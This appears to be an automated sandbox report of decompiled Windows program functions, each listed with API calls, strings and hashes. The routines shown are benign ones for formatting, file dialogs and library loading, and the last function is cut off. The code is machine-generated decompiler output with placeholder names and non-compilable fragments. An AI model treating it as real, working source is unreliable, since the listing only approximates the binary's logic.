                                                                                                                							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                                						}
                                                                                                                						_t41 = wcschr(_t79, 0x2c);
                                                                                                                						_pop(_t70);
                                                                                                                						if(_t41 != 0) {
                                                                                                                							L8:
                                                                                                                							_v20 = _t75;
                                                                                                                							_v28 = _t75;
                                                                                                                							_v36 = _t75;
                                                                                                                							_v24 = 0x100;
                                                                                                                							_v32 = 1;
                                                                                                                							_v16 = 0x22;
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							while(1) {
                                                                                                                								_t45 =  *_t79 & 0x0000ffff;
                                                                                                                								__eflags = _t45;
                                                                                                                								_v12 = _t45;
                                                                                                                								_t77 =  &_v36;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								__eflags = _t45 - 0x22;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push( &_v12);
                                                                                                                									_t48 = 1;
                                                                                                                									__eflags = 1;
                                                                                                                								} else {
                                                                                                                									_push(L"\"\"");
                                                                                                                									_t48 = _t45 | 0xffffffff;
                                                                                                                								}
                                                                                                                								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                                								_t79 =  &(_t79[0]);
                                                                                                                								__eflags = _t79;
                                                                                                                							}
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							_t53 = _v20;
                                                                                                                							__eflags = _t53;
                                                                                                                							if(_t53 == 0) {
                                                                                                                								_t53 = 0x40c4e8;
                                                                                                                							}
                                                                                                                							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                                							_t75 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							_t62 = wcschr(_t79, 0x22);
                                                                                                                							_pop(_t70);
                                                                                                                							if(_t62 != 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								E00407343(_t66, _a4, _t79);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                                							E00407343(_t66, _a4, ",");
                                                                                                                						}
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t66, _a4, L"\r\n");
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v80;
                                                                                                                				signed short _v65616;
                                                                                                                				void* _t27;
                                                                                                                				intOrPtr _t28;
                                                                                                                				void* _t34;
                                                                                                                				intOrPtr _t39;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				void* _t52;
                                                                                                                
                                                                                                                				_t51 = __esi;
                                                                                                                				E0040B550(0x1004c, __ecx);
                                                                                                                				_t39 = 0;
                                                                                                                				_push(0);
                                                                                                                				_push( &_v8);
                                                                                                                				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                                				_push(L"Lines");
                                                                                                                				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                                				if(_v8 > 0) {
                                                                                                                					do {
                                                                                                                						_t6 = _t39 + 1; // 0x1
                                                                                                                						_t28 = _t6;
                                                                                                                						_push(_t28);
                                                                                                                						_push(L"Line%d");
                                                                                                                						_v12 = _t28;
                                                                                                                						_push(0x1f);
                                                                                                                						_push( &_v80);
                                                                                                                						L0040B1EC();
                                                                                                                						_t52 = _t52 + 0x10;
                                                                                                                						_push(0x7fff);
                                                                                                                						_push(0x40c4e8);
                                                                                                                						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                                                							_v65616 = _v65616 & 0x00000000;
                                                                                                                							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                                                							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                                                						} else {
                                                                                                                							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                                                						}
                                                                                                                						_t39 = _v12;
                                                                                                                					} while (_t39 < _v8);
                                                                                                                					return _t34;
                                                                                                                				}
                                                                                                                				return _t27;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v26;
                                                                                                                				void _v28;
                                                                                                                				void* _t24;
                                                                                                                				void* _t25;
                                                                                                                				void* _t35;
                                                                                                                				signed int _t38;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t44;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t24 = _a12;
                                                                                                                				_t45 = _t44 - 0x18;
                                                                                                                				_t42 = 0;
                                                                                                                				 *_t24 = 0;
                                                                                                                				if(_a8 <= 0) {
                                                                                                                					_t25 = 0;
                                                                                                                				} else {
                                                                                                                					_t38 = 0;
                                                                                                                					_t35 = 0;
                                                                                                                					if(_a8 > 0) {
                                                                                                                						_v8 = _t24;
                                                                                                                						while(1) {
                                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosw");
                                                                                                                							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                							_push(L"%2.2X ");
                                                                                                                							_push(0xa);
                                                                                                                							_push( &_v28);
                                                                                                                							L0040B1EC();
                                                                                                                							_t38 = _t42;
                                                                                                                							memcpy(_v8,  &_v28, 6);
                                                                                                                							_t13 = _t42 + 3; // 0x3
                                                                                                                							_t45 = _t45 + 0x1c;
                                                                                                                							if(_t13 >= 0x2000) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_v8 = _v8 + 6;
                                                                                                                							_t35 = _t35 + 1;
                                                                                                                							_t42 = _t42 + 3;
                                                                                                                							if(_t35 < _a8) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t24 = _a12;
                                                                                                                					}
                                                                                                                					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                					_t25 = 1;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _t22;
                                                                                                                				signed int _t30;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t35;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_t35 = __esi;
                                                                                                                				_t34 = 0;
                                                                                                                				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                                						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                                						L0040B1EC();
                                                                                                                						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                                						_push( &_v44);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t36 = _t36 + 0x24;
                                                                                                                						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						_t34 = _t34 + 1;
                                                                                                                					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t35, _a4, L"\r\n");
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				wchar_t* _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v76;
                                                                                                                				struct tagOFNA _v80;
                                                                                                                
                                                                                                                				_v76 = __eax;
                                                                                                                				_v68 = _a4;
                                                                                                                				_v64 = 0;
                                                                                                                				_v44 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = _a8;
                                                                                                                				_v20 = _a12;
                                                                                                                				_v80 = 0x4c;
                                                                                                                				_v56 = 1;
                                                                                                                				_v52 = __esi;
                                                                                                                				_v48 = 0x104;
                                                                                                                				_v28 = 0x81804;
                                                                                                                				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					wcscpy(__esi, _v52);
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t10;
                                                                                                                				void* _t12;
                                                                                                                				struct HINSTANCE__** _t13;
                                                                                                                
                                                                                                                				_t13 = __eax;
                                                                                                                				_t12 = 0;
                                                                                                                				if(E00408F72(__eax) != 0) {
                                                                                                                					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                                					if(_t10 != 0) {
                                                                                                                						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
                                                                                                                				_Unknown_base(*)()* _t3;
                                                                                                                				void* _t7;
                                                                                                                				struct HINSTANCE__* _t8;
                                                                                                                				char** _t9;
                                                                                                                
                                                                                                                				_t7 = 0;
                                                                                                                				_t8 = E00405436(L"shlwapi.dll");
                                                                                                                				 *_t9 = "SHAutoComplete";
                                                                                                                				_t3 = GetProcAddress(_t8, ??);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t8);
                                                                                                                				return _t7;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
                                                                                                                				wchar_t* _t2;
                                                                                                                				wchar_t* _t6;
                                                                                                                
                                                                                                                				_t6 = __esi;
                                                                                                                				E00404AD9(__esi);
                                                                                                                				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                				if(_t2 != 0) {
                                                                                                                					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                				}
                                                                                                                				return wcscat(_t6, L"_lng.ini");
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
                                                                                                                				struct HINSTANCE__* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                
                                                                                                                				if( *0x4101c4 == 0) {
                                                                                                                					_t1 = E00405436(L"shell32.dll");
                                                                                                                					 *0x4101c4 = _t1;
                                                                                                                					if(_t1 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                						 *0x4101c0 = _t2;
                                                                                                                						return _t2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
                                                                                                                				char* _t30;
                                                                                                                				char** _t39;
                                                                                                                
                                                                                                                				_t39 = __esi;
                                                                                                                				 *__esi = "cf@";
                                                                                                                				__esi[0xb8] = 0;
                                                                                                                				_t30 = E00404FA4(0x338, __esi);
                                                                                                                				_push(0x14);
                                                                                                                				__esi[0xcb] = 0;
                                                                                                                				__esi[0xa6] = 0;
                                                                                                                				__esi[0xb9] = 0;
                                                                                                                				__esi[0xba] = 0xfff;
                                                                                                                				__esi[8] = 0;
                                                                                                                				__esi[1] = 0;
                                                                                                                				__esi[0xb7] = 1;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[2] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[3] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[4] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_t39[5] = _t30;
                                                                                                                				return _t39;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                				int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __edi;
                                                                                                                				int _t32;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t36;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t58;
                                                                                                                				signed int _t59;
                                                                                                                				void** _t62;
                                                                                                                				void** _t63;
                                                                                                                				signed int* _t66;
                                                                                                                
                                                                                                                				_t66 = __eax;
                                                                                                                				_t32 = wcslen(_a4);
                                                                                                                				_t48 =  *(_t66 + 4);
                                                                                                                				_t58 = _t48 + _t32;
                                                                                                                				_v12 = _t58;
                                                                                                                				_t59 = _t58 + 1;
                                                                                                                				_v8 = _t32;
                                                                                                                				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                				 *(_t66 + 4) = _t59;
                                                                                                                				_t62 = _t66 + 0x10;
                                                                                                                				if(_t59 != 0xffffffff) {
